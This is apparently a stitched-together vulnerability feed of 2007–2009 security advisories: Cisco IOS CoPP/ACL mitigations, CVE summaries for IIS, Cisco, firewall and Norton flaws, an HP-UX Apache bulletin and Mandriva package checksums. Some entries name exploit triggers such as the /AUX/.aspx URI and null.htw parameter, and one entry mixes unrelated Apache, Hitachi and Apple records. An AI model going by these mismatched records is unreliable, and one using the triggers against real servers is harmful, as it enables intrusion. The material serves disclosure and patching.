    access-list 100 permit udp any any eq 500
    !-- port 848 - GDOI
    access-list 100 permit tcp any any eq 848
    !-- port 5060 - SIP-TLS
    access-list 100 permit tcp any any eq 5060
    !-- port 5354 - TIDP
    access-list 100 permit tcp any any eq 5354
    !-- Permit (Police or Drop)/Deny (Allow) all other Layer3 and Layer4
    !-- traffic in accordance with existing security policies and
    !-- configurations for traffic that is authorized to be sent
    !-- to infrastructure devices. 
    !
    !-- Create a Class-Map for traffic to be policed by
    !-- the CoPP feature. 
    !
    class-map match-all Drop-Known-Undesirable
     match access-group 100
    !
    !-- Create a Policy-Map that will be applied to the
    !-- Control-Plane of the device. 
    !
    policy-map CoPP-Input-Policy
     class Drop-Known-Undesirable
      drop
    !-- Apply the Policy-Map to the Control-Plane of the
    !-- device. 
    !
    control-plane
     service-policy input CoPP-Input-Policy
Please note that in the 12.0S, 12.2S, and 12.2SX Cisco IOS trains, the
policy-map syntax is different:
    policy-map CoPP-Input-Policy
     class Drop-Known-Undesirable
     police 32000 1500 1500 conform-action drop exceed-action drop
NOTE: In the above CoPP example, the ACL entries with the "permit" action that
match the exploit packets result in the discarding of those packets by the
policy-map drop function, while packets that match the "deny" action are not
affected by the policy-map drop function. 
Additional information on the configuration and use of the CoPP
feature can be found at 
http://www.cisco.com/en/US/products/ps6642/products_white_paper0900aecd804fa16a.shtml
and 
http://www.cisco.com/en/US/products/sw/iosswrel/ps1838/products_feature_guide09186a008052446b.html
Access Control List (ACL)
+------------------------
Access control lists can be used to help mitigate attacks that may try to
exploit these vulnerabilities. This is done in a way that only packets from the
legitimate sources are allowed to reach the device and all others are dropped. 
    access-list 101 permit tcp host <legitimate_host_IP_address> host <router_IP_address> eq 443
    access-list 101 permit udp host <legitimate_host_IP_address> host <router_IP_address> eq 500
    access-list 101 permit tcp host <legitimate_host_IP_address> host <router_IP_address> eq 506
    access-list 101 permit tcp host <legitimate_host_IP_address> host <router_IP_address> eq 4848
    access-list 101 permit tcp host <legitimate_host_IP_address> host <router_IP_address> eq 5060
    access-list 101 permit tcp host <legitimate_host_IP_address> host <router_IP_address> eq 5354
    access-list 101 deny tcp any any eq 443
    access-list 101 deny udp any any eq 500
    access-list 101 deny tcp any any eq 506
    access-list 101 deny udp any any eq 4848
    access-list 101 deny tcp any any eq 5060
    access-list 101 deny tcp any any eq 5354
Obtaining Fixed Software
========================
Cisco has made free software available to address this vulnerability for
affected customers. Prior to deploying software, customers should consult their
maintenance provider or check the software for feature set compatibility and
known issues specific to their environment. 
Customers may only install and expect support for the feature
sets they have purchased. By installing, downloading, accessing
or otherwise using such software upgrades, customers agree to be
bound by the terms of Cisco's software license terms found at
http://www.cisco.com/public/sw-license-agreement.html, or as otherwise
set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml. 
Do not contact either "psirt@cisco.com" or "security-alert@cisco.com" for
software upgrades. 
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through their regular
update channels. For most customers, this means that upgrades should be
obtained through the Software Center on Cisco's worldwide website at 
http://www.cisco.com. 
Customers using Third-party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through prior or
existing agreement with third-party support organizations such as Cisco
Partners, authorized resellers, or service providers should contact that
support organization for guidance and assistance with the appropriate course of
action in regards to this advisory. 
The effectiveness of any workaround or fix is dependent on specific customer
situations such as product mix, network topology, traffic behavior, and
organizational mission. Due to the variety of affected products and releases,
customers should consult with their service provider or support organization to
ensure any applied workaround or fix is the most appropriate for use in the
intended network before it is deployed. 
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but who do not hold a Cisco service
contract and customers who purchase through third-party vendors but are
unsuccessful at obtaining fixed software through their point of sale should get
their upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC
contacts are as follows. 
  * +1 800 553 2447 (toll free from within North America)
  * +1 408 526 7209 (toll call from anywhere in the world)
  * e-mail: tac@cisco.com
Have your product serial number available and give the URL of this notice as
evidence of your entitlement to a free upgrade. Free upgrades for non-contract
customers must be requested through the TAC. 
Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for
additional TAC contact information, including special localized telephone
numbers and instructions and e-mail addresses for use in various languages. 
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious use of
the vulnerability described in this Advisory. 
This vulnerability was discovered by Cisco during internal testing. 
Status of This Notice: Interim
==============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF
GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS
FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS
LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO
CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. CISCO EXPECTS TO UPDATE THIS
DOCUMENT AS NEW INFORMATION BECOMES AVAILABLE. 
A stand-alone copy or Paraphrase of the text of this document that omits the
distribution URL in the following section is an uncontrolled copy, and may lack
important information or contain factual errors. 
Distribution
============
This advisory is posted on Cisco's worldwide website at 
http://www.cisco.com/warp/public/707/cisco-sa-20070522-crypto.shtml. 
In addition to worldwide web posting, a text version of this notice is
clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail
and Usenet news recipients. 
  * cust-security-announce@cisco.com
  * first-teams@first.org
  * bugtraq@securityfocus.com
  * vulnwatch@vulnwatch.org
  * cisco@spot.colorado.edu
  * cisco-nsp@puck.nether.net
  * full-disclosure@lists.grok.org.uk
  * comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's worldwide
website, but may or may not be actively announced on mailing lists or
newsgroups. Users concerned about this problem are encouraged to check the
above URL for any updates. 
Revision History
================
+---------------------------------------------------------------------+
| Revision 1.0     | 2007-May-22     | Initial public release.        |
+---------------------------------------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco products,
obtaining assistance with security incidents, and registering to receive
security information from Cisco, is available on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco security
notices. All Cisco security advisories are available at 
http://www.cisco.com/go/psirt. 
- -------------------------------------------------------------------------------
All contents are Copyright 2006-2007 Cisco Systems, Inc. All rights reserved. 
- -------------------------------------------------------------------------------
Updated: May 22, 2007                                        Document ID: 91890
- -------------------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)
iD8DBQFGUv7c8NUAbBmDaxQRAse8AJ9YwxPEprfhiJNzLVTLMXsTnTuWSwCghmmF
qlrKeNA331DvYso6f2C5mRk=
=dfTU
-----END PGP SIGNATURE-----
                        
| VAR-200705-0140 | CVE-2007-2813 | Cisco IOS Illegal in SSL Service disruption due to packets (DoS) Vulnerabilities | CVSS V2: 7.8 CVSS V3: - Severity: HIGH | 
                            Cisco IOS 12.4 and earlier, when using the crypto packages and SSL support is enabled, allows remote attackers to cause a denial of service via a malformed (1) ClientHello, (2) ChangeCipherSpec, or (3) Finished message during an SSL session. According to information from Cisco Systems, the vulnerability is HTTPS Server WebVPN Such as service SSL The function to use is enabled Cisco IOS The device may be affected. Cisco IOS is prone to multiple denial-of-service vulnerabilities because it fails to handle malformed SSL packets. 
Attackers can exploit these issues to cause denial-of-service conditions on an affected device. 
NOTE: Attackers can exploit these issues only via an established TCP connection, but only prior to security authentication. An attacker can, however, interrupt a secure session and inject malicious packets when a new session is started. Due to these factors, the likelihood of successful attacks is reduced. Cisco IOS is the operating system used by Cisco networking equipment. Attackers can trigger these vulnerabilities after a TCP connection is created but before authentication credentials (such as username/password or certificates) are exchanged, requiring completion of the TCP triple handshake reduces the probability of exploiting these vulnerabilities by using spoofed IP addresses. An attacker intercepting communication between two affected devices would not be able to exploit this vulnerability if an SSL session has already been established, as SSL protects against this type of injection
                        
| VAR-200705-0032 | CVE-2007-2897 | Microsoft IIS 6.0 Service disruption in (DoS) Vulnerabilities | CVSS V2: 7.5 CVSS V3: - Severity: HIGH | 
                            Microsoft Internet Information Services (IIS) 6.0 allows remote attackers to cause a denial of service (server instability or device hang), and possibly obtain sensitive information (device communication traffic); and might allow attackers with physical access to execute arbitrary code after connecting a data stream to a device COM port; via requests for a URI containing a '/' immediately before and after the name of a DOS device, as demonstrated by the /AUX/.aspx URI, which bypasses a blacklist for DOS device requests. Microsoft Internet Information Services is prone to a security-bypass vulnerability. 
Remote attackers can exploit this issue to hang the application, denying service to legitimate users, or disclose sensitive information. Attackers with physical access to the system may be able to execute arbitrary code with the privileges of the application. 
Microsoft Internet Information Services 6.0 is vulnerable; other versions may also be affected
                        
| VAR-200705-0069 | CVE-2007-2815 | Microsoft IIS Web Server of webhits.dll Private in Web Directory access vulnerability | CVSS V2: 10.0 CVSS V3: - Severity: HIGH | 
                            The "hit-highlighting" functionality in webhits.dll in Microsoft Internet Information Services (IIS) Web Server 5.0 only uses Windows NT ACL configuration, which allows remote attackers to bypass NTLM and basic authentication mechanisms and access private web directories via the CiWebhitsfile parameter to null.htw. Microsoft IIS is prone to an authentication-bypass vulnerability due to its implementation of 'Hit-highlighting' functionality. 
Attackers can exploit this issue to access private files hosted on an IIS website. Successful exploits may allow attackers to gain access to potentially sensitive information. Other attacks are possible. 
NOTE: Presumably, accessing a Trusted Zone may allow attackers to execute commands; this has not been confirmed
                        
| VAR-200705-0348 | CVE-2007-2729 | Comodo Firewall Pro In Microsoft Windows API Function call vulnerability | CVSS V2: 7.2 CVSS V3: - Severity: HIGH | 
                            Comodo Firewall Pro 2.4.18.184 and Comodo Personal Firewall 2.3.6.81, and probably older Comodo Firewall versions, do not properly test for equivalence of process identifiers for certain Microsoft Windows API functions in the NT kernel 5.0 and greater, which allows local users to call these functions, and bypass firewall rules or gain privileges, via a modified identifier that is one, two, or three greater than the canonical identifier. Comodo Firewall Pro is prone to a local security vulnerability. These malformed identifiers are one, two, or three larger than the standard identifiers
                        
| VAR-200705-0349 | CVE-2007-2730 | Check Point ZoneAlarm Pro Vulnerability gained in | CVSS V2: 7.2 CVSS V3: - Severity: HIGH | 
                            Check Point ZoneAlarm Pro before 6.5.737.000 does not properly test for equivalence of process identifiers for certain Microsoft Windows API functions in the NT kernel 5.0 and greater, which allows local users to call these functions, and bypass firewall rules or gain privileges, via a modified identifier that is one, two, or three greater than the canonical identifier. Comodo Firewall Pro is prone to a local security vulnerability
                        
| VAR-200705-0188 | CVE-2007-1689 | Symantec Norton Internet Security 2004 ISAlertDataCOM ActiveX control stack buffer overflow | CVSS V2: 10.0 CVSS V3: - Severity: HIGH | 
                            Buffer overflow in the ISAlertDataCOM ActiveX control in ISLALERT.DLL for Norton Personal Firewall 2004 and Internet Security 2004 allows remote attackers to execute arbitrary code via long arguments to the (1) Get and (2) Set functions. Symantec Norton Personal Firewall is a very popular firewall software. The Get() and Set() functions used by the ISAlertDataCOM function in the ISLALERT.DLL library of Norton Personal Firewall do not correctly verify the input parameters. If the user is tricked into browsing a specially crafted HTML document, it may trigger a buffer overflow, resulting in a login user permissions to execute arbitrary commands
                        
| VAR-200705-0406 | CVE-2007-2682 | Adobe CS3 Used in Adobe Version Cue CS3 Server Vulnerability that bypasses firewall rules in the installer | CVSS V2: 7.5 CVSS V3: - Severity: HIGH | 
                            The installer for Adobe Version Cue CS3 Server on Apple Mac OS X, as used in Adobe Creative Suite 3 (CS3), does not re-enable the personal firewall after completing the product installation, which allows remote attackers to bypass intended firewall rules. Adobe Version Cue CS3 Server is prone to a weakness that results from a design error. 
An attacker could take advantage of this weakness to exploit other vulnerabilities or to carry out a variety of attacks against a computer
                        
| VAR-200705-0688 | CVE-2008-2364 | Hitachi Web Server Reverse Proxy Denial of Service (DoS) Vulnerability | CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM | 
                            The ap_proxy_http_process_response function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server 2.0.63 and 2.2.8 does not limit the number of forwarded interim responses, which allows remote HTTP servers to cause a denial of service (memory consumption) via a large number of interim responses. Hitachi Web Server contains a vulnerability that could lead to a denial of service (DoS) condition when using it as a reverse proxy due to excessive memory usage.The server could fall into a denial of service (DoS) state when continuously receiving fraudulent responses from backend Web servers. (DoS) Vulnerabilities exist.Denial of service due to response sent in large quantities by third parties (DoS) There is a possibility of being put into a state. 
Attackers may exploit this issue to cause denial-of-service conditions. 
Reportedly, the issue affects Apache 2.2.8 and 2.0.63; other versions may also be affected. Apple Mac OS X is prone to multiple security vulnerabilities that have been addressed in Security Update 2008-007. 
The security update addresses a total of 11 new vulnerabilities that affect the ColorSync, CUPS, Finder, launchd, Networking, Postfix, PSNormalizer, rlogin, Script Editor, and Weblog components of Mac OS X. The advisory also contains security updates for 30 previously reported issues. 
NOTE: This BID is being retired; the following individual records have been created to better document these issues:
31716 Apple Script Editor Unspecified Insecure Temporary File Creation Vulnerability
31718 Apple Mac OS X Server Weblog Access Control List Security Bypass Vulnerability
31708 Apple Mac OS X 'hosts.equiv' Security Bypass Vulnerability
31721 Apple Mac OS X 10.5 Postfix Security Bypass Vulnerability
31719 Apple PSNormalizer PostScript Buffer Overflow Vulnerability
31711 Apple Mac OS X 'configd' EAPOLController Plugin Local Heap Based Buffer Overflow Vulnerability
31715 Apple Mac OS X ColorSync ICC Profile Remote Buffer Overflow Vulnerability
31720 Apple Finder Denial of Service Vulnerability
31707 Apple OS X QuickLook Excel File Integer Overflow Vulnerability
31688 CUPS 'HP-GL/2' Filter Remote Code Execution Vulnerability
31722 Apple Mac OS X 10.5 'launchd' Unspecified Security Bypass Vulnerability. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c01650939
Version: 1
HPSBUX02401 SSRT090005 rev.1 - HP-UX Running Apache Web Server Suite, Remote Denial of Service (DoS), Cross-site Scripting (XSS), Execution of Arbitrary Code, Cross-Site Request Forgery (CSRF)
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. 
Release Date: 2009-02-02
Last Updated: 2009-02-02
Potential Security Impact: Remote Denial of Service (DoS), cross-site scripting (XSS), execution of arbitrary code, cross-site request forgery (CSRF)
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP-UX running Apache-based Web Server or Tomcat-based Servelet Engine. The vulnerabilities could be exploited remotely to cause a Denial of Service (DoS), cross-site scripting (XSS), execution of arbitrary code, or cross-site request forgery (CSRF). Apache-based Web Server and Tomcat-based Servelet Engine are contained in the Apache Web Server Suite. 
References: CVE-2007-6420, CVE-2008-1232, CVE-2008-1947, CVE-2008-2364, CVE-2008-2370, CVE-2008-2938, CVE-2008-2939, CVE-2008-3658
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. 
HP-UX B.11.23 and B.11.31 running Apache-based Web Server v2.2.8.01.01 or earlier or Tomcat-based Servelet Engine v5.5.27.01.01 or earlier 
HP-UX B.11.11 running Apache-based Web Server v2.2.8.01.01 or earlier 
BACKGROUND
CVSS 2.0 Base Metrics 
===============================================
Reference                         Base Vector               Base Score 
CVE-2007-6420     (AV:N/AC:M/Au:N/C:N/I:P/A:N)      4.3
CVE-2008-1232     (AV:N/AC:M/Au:N/C:N/I:P/A:N)      4.3
CVE-2008-1947     (AV:N/AC:M/Au:N/C:N/I:P/A:N)      4.3
CVE-2008-2364     (AV:N/AC:M/Au:N/C:N/I:P/A:N)      5.0
CVE-2008-2370     (AV:N/AC:M/Au:N/C:N/I:P/A:N)      5.0
CVE-2008-2938     (AV:N/AC:M/Au:N/C:N/I:P/A:N)      4.3
CVE-2008-2939     (AV:N/AC:M/Au:N/C:N/I:P/A:N)      4.3
CVE-2008-3658     (AV:N/AC:M/Au:N/C:N/I:P/A:N)      7.5
===============================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002. 
 
RESOLUTION
HP has provided the following upgrades to resolve these vulnerabilities. 
The upgrades are available from the following location: 
URL: http://software.hp.com 
Note: HP-UX Web Server Suite v.3.02 contains HP-UX Apache-based Web Server v.2.2.8.01.02 
and HP-UX Tomcat-based Servlet Engine 5.5.27.01.01 
HP-UX Release - B.11.23 and B.11.31 PA-32
Apache Depot name - HPUXWSATW-B302-32.depot
 
HP-UX Release - B.11.23 and B.11.31 IA-64
Apache Depot name - HPUXWSATW-B302-64.depot
 
HP-UX Release - B.11.11 PA-32
Apache Depot name - HPUXWSATW-B222-1111.depot
 
MANUAL ACTIONS: Yes - Update 
Install Apache-based Web Server or Tomcat-based Servelet Engine from the Apache Web Server Suite v3.02 or subsequent 
PRODUCT SPECIFIC INFORMATION 
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa 
The following text is for use by the HP-UX Software Assistant. 
AFFECTED VERSIONS 
HP-UX B.11.11 
================== 
hpuxwsAPACHE.APACHE 
hpuxwsAPACHE.APACHE2 
hpuxwsAPACHE.AUTH_LDAP 
hpuxwsAPACHE.AUTH_LDAP2 
hpuxwsAPACHE.MOD_JK 
hpuxwsAPACHE.MOD_JK2 
hpuxwsAPACHE.MOD_PERL 
hpuxwsAPACHE.MOD_PERL2 
hpuxwsAPACHE.PHP 
hpuxwsAPACHE.PHP2 
hpuxwsAPACHE.WEBPROXY 
hpuxwsTOMCAT.TOMCAT 
hpuxwsWEBMIN.WEBMIN 
action: install revision B.2.2.8.01.02 or subsequent 
URL: http://software.hp.com 
HP-UX B.11.23 
================== 
hpuxws22APCH32.APACHE 
hpuxws22APCH32.APACHE2 
hpuxws22APCH32.AUTH_LDAP 
hpuxws22APCH32.AUTH_LDAP2 
hpuxws22APCH32.MOD_JK 
hpuxws22APCH32.MOD_JK2 
hpuxws22APCH32.MOD_PERL 
hpuxws22APCH32.MOD_PERL2 
hpuxws22APCH32.PHP 
hpuxws22APCH32.PHP2 
hpuxws22APCH32.WEBPROXY 
hpuxws22APCH32.WEBPROXY2 
hpuxws22TOMCAT.TOMCAT 
hpuxws22WEBMIN.WEBMIN 
action: install revision B.2.2.8.01.02 or subsequent 
URL: http://software.hp.com 
HP-UX B.11.31 
================== 
hpuxws22APACHE.APACHE 
hpuxws22APACHE.APACHE2 
hpuxws22APACHE.AUTH_LDAP 
hpuxws22APACHE.AUTH_LDAP2 
hpuxws22APACHE.MOD_JK 
hpuxws22APACHE.MOD_JK2 
hpuxws22APACHE.MOD_PERL 
hpuxws22APACHE.MOD_PERL2 
hpuxws22APACHE.PHP 
hpuxws22APACHE.PHP2 
hpuxws22APACHE.WEBPROXY 
hpuxws22APACHE.WEBPROXY2 
hpuxws22TOMCAT.TOMCAT 
hpuxws22WEBMIN.WEBMIN 
action: install revision B.2.2.8.01.02 or subsequent 
URL: http://software.hp.com 
END AFFECTED VERSIONS 
HISTORY 
Version:1 (rev.1) 2 February 2009 Initial release 
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. 
Support: For further information, contact normal HP Services support channel. 
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com 
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. 
To get the security-alert PGP key, please send an e-mail message as follows:
  To: security-alert@hp.com 
  Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: 
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC 
On the web page: ITRC security bulletins and patch sign-up 
Under Step1: your ITRC security bulletins and patches 
  - check ALL categories for which alerts are required and continue. 
Under Step2: your ITRC operating systems 
  - verify your operating system selections are checked and save. 
To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php 
Log in on the web page: Subscriber's choice for Business: sign-in. 
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. 
To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do 
* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: 
GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
 
System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. 
"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."
\xa9Copyright 2009 Hewlett-Packard Development Company, L.P. 
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. 
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1
iQA/AwUBSYhX8+AfOvwtKn1ZEQJxcACeJa8lt5TkhV5qnaGRTaBh4kqHutgAoJbH
XCe08aGCzEZj/q4n91JQnhq6
=XImF
-----END PGP SIGNATURE-----
. 
 
 A cross-site scripting vulnerability was found in the mod_proxy_ftp
 module in Apache that allowed remote attackers to inject arbitrary
 web script or HTML via wildcards in a pathname in an FTP URI
 (CVE-2008-2939). 
 
 The updated packages have been patched to prevent these issues. 
 _______________________________________________________________________
 References:
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2364
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2939
 _______________________________________________________________________
 Updated Packages:
 Mandriva Linux 2007.1:
 7ba0fa98b5e5f34f2c3bb5798f300736  2007.1/i586/apache-base-2.2.4-6.5mdv2007.1.i586.rpm
 82dccbbcca45d5aba2c7a9afb615ffb7  2007.1/i586/apache-devel-2.2.4-6.5mdv2007.1.i586.rpm
 43c50d9ad73f39e88acf35a48915f472  2007.1/i586/apache-htcacheclean-2.2.4-6.5mdv2007.1.i586.rpm
 7e7821b41de94eba4e413c4218e72f05  2007.1/i586/apache-mod_authn_dbd-2.2.4-6.5mdv2007.1.i586.rpm
 82b527ca5b90f4857ece74972c34bd2b  2007.1/i586/apache-mod_cache-2.2.4-6.5mdv2007.1.i586.rpm
 4bc7f0488a4c8ea05446ea04611fa671  2007.1/i586/apache-mod_dav-2.2.4-6.5mdv2007.1.i586.rpm
 fa53bb715a9733fc5f4ef8a18e8a1577  2007.1/i586/apache-mod_dbd-2.2.4-6.5mdv2007.1.i586.rpm
 d9759e97fb29783b69ee4bebba96e9d8  2007.1/i586/apache-mod_deflate-2.2.4-6.5mdv2007.1.i586.rpm
 9934937a1a7fb3ab277daac03a04fd6e  2007.1/i586/apache-mod_disk_cache-2.2.4-6.5mdv2007.1.i586.rpm
 4f16a0af444be1610749287944264d1b  2007.1/i586/apache-mod_file_cache-2.2.4-6.5mdv2007.1.i586.rpm
 9b1fc5ab5579bde1fbfb9ae08b18d1ec  2007.1/i586/apache-mod_ldap-2.2.4-6.5mdv2007.1.i586.rpm
 9a9029063f10dd3fa81ee4eed3fe5d51  2007.1/i586/apache-mod_mem_cache-2.2.4-6.5mdv2007.1.i586.rpm
 6930a06576c337ca7ecaab2a8cf4ca59  2007.1/i586/apache-mod_proxy-2.2.4-6.5mdv2007.1.i586.rpm
 c7834d18c0999590abb42d3efad7a035  2007.1/i586/apache-mod_proxy_ajp-2.2.4-6.5mdv2007.1.i586.rpm
 641b5bc3988af4ee0f5600e2d34c1230  2007.1/i586/apache-mod_ssl-2.2.4-6.5mdv2007.1.i586.rpm
 af9bada6d30145bfaa58be10eec6798b  2007.1/i586/apache-modules-2.2.4-6.5mdv2007.1.i586.rpm
 796296888cfb7978fbca22764de10753  2007.1/i586/apache-mod_userdir-2.2.4-6.5mdv2007.1.i586.rpm
 110acb3a28bf8e911309afd7d5381950  2007.1/i586/apache-mpm-event-2.2.4-6.5mdv2007.1.i586.rpm
 065949244c838c9ec8baf47e66227803  2007.1/i586/apache-mpm-itk-2.2.4-6.5mdv2007.1.i586.rpm
 ad0e0e109fbed8fc7be0d6b8b36c7503  2007.1/i586/apache-mpm-prefork-2.2.4-6.5mdv2007.1.i586.rpm
 31ce817bb36ec93214fdb177f86096cf  2007.1/i586/apache-mpm-worker-2.2.4-6.5mdv2007.1.i586.rpm
 5eba2d9af248c7107279f21cd4bde2b3  2007.1/i586/apache-source-2.2.4-6.5mdv2007.1.i586.rpm 
 012cdfd939633fa3feae44c7d7bec736  2007.1/SRPMS/apache-2.2.4-6.5mdv2007.1.src.rpm
 Mandriva Linux 2007.1/X86_64:
 5997be8532eccc8f20f5c121895df248  2007.1/x86_64/apache-base-2.2.4-6.5mdv2007.1.x86_64.rpm
 096a4e2f17838c847099f2dc41e4ca5a  2007.1/x86_64/apache-devel-2.2.4-6.5mdv2007.1.x86_64.rpm
 b4f3cd71a3683bcc4e9b1dcdabcbfdaa  2007.1/x86_64/apache-htcacheclean-2.2.4-6.5mdv2007.1.x86_64.rpm
 f03a92759c1159477f04890092636f27  2007.1/x86_64/apache-mod_authn_dbd-2.2.4-6.5mdv2007.1.x86_64.rpm
 1bc914605bd0c3b05d455eeb053068e2  2007.1/x86_64/apache-mod_cache-2.2.4-6.5mdv2007.1.x86_64.rpm
 3e8aaa6e0d70bdc5f439928f102a5f61  2007.1/x86_64/apache-mod_dav-2.2.4-6.5mdv2007.1.x86_64.rpm
 a51dabbb6220c17ecdb001cf1444e99f  2007.1/x86_64/apache-mod_dbd-2.2.4-6.5mdv2007.1.x86_64.rpm
 1252150d2fc936309c6cb9794627cc8f  2007.1/x86_64/apache-mod_deflate-2.2.4-6.5mdv2007.1.x86_64.rpm
 bc4878995bfe34a46419a3a6aa090d91  2007.1/x86_64/apache-mod_disk_cache-2.2.4-6.5mdv2007.1.x86_64.rpm
 cd8b213c41d3dce5070483cf2e9d71e2  2007.1/x86_64/apache-mod_file_cache-2.2.4-6.5mdv2007.1.x86_64.rpm
 ec1a79f3d6defecb3ed2dbf8d85ba98c  2007.1/x86_64/apache-mod_ldap-2.2.4-6.5mdv2007.1.x86_64.rpm
 6158e3825e4b7e631f6c6eab65660aab  2007.1/x86_64/apache-mod_mem_cache-2.2.4-6.5mdv2007.1.x86_64.rpm
 4b01be50b5531dfd3a92189388165c7b  2007.1/x86_64/apache-mod_proxy-2.2.4-6.5mdv2007.1.x86_64.rpm
 32735f0b995664e2983c3768473db144  2007.1/x86_64/apache-mod_proxy_ajp-2.2.4-6.5mdv2007.1.x86_64.rpm
 a1709d589420b97e255a7f5db47e859c  2007.1/x86_64/apache-mod_ssl-2.2.4-6.5mdv2007.1.x86_64.rpm
 936c34490fcc180777a3248d9970da5a  2007.1/x86_64/apache-modules-2.2.4-6.5mdv2007.1.x86_64.rpm
 0364549013611e3e748a917a6269a61d  2007.1/x86_64/apache-mod_userdir-2.2.4-6.5mdv2007.1.x86_64.rpm
 2640fd4b78d98e1aa7a8d994d7610b16  2007.1/x86_64/apache-mpm-event-2.2.4-6.5mdv2007.1.x86_64.rpm
 4edad0e4f3119f88d4360d5a11dd3fd4  2007.1/x86_64/apache-mpm-itk-2.2.4-6.5mdv2007.1.x86_64.rpm
 6ed107f6f60a88008aa0a21d1133c78e  2007.1/x86_64/apache-mpm-prefork-2.2.4-6.5mdv2007.1.x86_64.rpm
 c39136dbd1fe0d53b80ed5fb232c775b  2007.1/x86_64/apache-mpm-worker-2.2.4-6.5mdv2007.1.x86_64.rpm
 46b245caca2ae8afa49d9e13122cae58  2007.1/x86_64/apache-source-2.2.4-6.5mdv2007.1.x86_64.rpm 
 012cdfd939633fa3feae44c7d7bec736  2007.1/SRPMS/apache-2.2.4-6.5mdv2007.1.src.rpm
 Mandriva Linux 2008.0:
 9fba06d7b75a7400faf855f0947f0ead  2008.0/i586/apache-base-2.2.6-8.2mdv2008.0.i586.rpm
 c560ededd59c4f2556074326363991fe  2008.0/i586/apache-devel-2.2.6-8.2mdv2008.0.i586.rpm
 80cb61aff0fc88d4e88074bfaf789e0a  2008.0/i586/apache-htcacheclean-2.2.6-8.2mdv2008.0.i586.rpm
 69d3778cb2452189e9586c2f517c67ff  2008.0/i586/apache-mod_authn_dbd-2.2.6-8.2mdv2008.0.i586.rpm
 3b965dacd1d53c70b21bcbb45b62b4e4  2008.0/i586/apache-mod_cache-2.2.6-8.2mdv2008.0.i586.rpm
 6b780e4611adb7d56bd562334f98c6ef  2008.0/i586/apache-mod_dav-2.2.6-8.2mdv2008.0.i586.rpm
 148aad51fd72443d47f8afbf07943fc0  2008.0/i586/apache-mod_dbd-2.2.6-8.2mdv2008.0.i586.rpm
 e908b7d6220cb636d53a9989ed84337b  2008.0/i586/apache-mod_deflate-2.2.6-8.2mdv2008.0.i586.rpm
 3ecc6c18d5ee2e34b6e3c770ce28199a  2008.0/i586/apache-mod_disk_cache-2.2.6-8.2mdv2008.0.i586.rpm
